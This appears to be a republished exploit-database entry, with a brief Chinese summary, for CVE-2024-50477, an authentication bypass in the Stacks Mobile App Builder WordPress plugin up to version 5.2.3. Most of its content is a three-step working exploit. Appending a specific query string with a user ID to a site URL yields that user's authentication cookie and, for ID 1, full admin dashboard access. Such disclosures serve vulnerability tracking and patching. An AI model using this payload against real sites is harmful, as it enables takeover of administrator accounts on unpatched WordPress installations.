Stacks Mobile App Builder 5.2.3 Authentication Bypass via Account Takeover
Stacks Mobile App Builder 5.2.3 存在认证绕过漏洞,攻击者可通过在 URL 中添加特定参数获取管理员权限。 2025-7-28 21:37:35 Author: cxsecurity.com(查看原文) 阅读量:16 收藏

# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover # Date: October 25, 2024 # Exploit Author: stealthcopter # Vendor Homepage: https://stacksmarket.co/ # Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/ # Version: <= 5.2.3 # Tested on: Ubuntu 24.10/Docker # CVE: CVE-2024-50477 # References: # - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md # - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover 1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`: `/?mobile_co=1&uid=1` 2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator). 3. Visit `/wp-admin` — you should have full access to the admin dashboard.



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025070034
如有侵权请联系:admin#unsafe.sh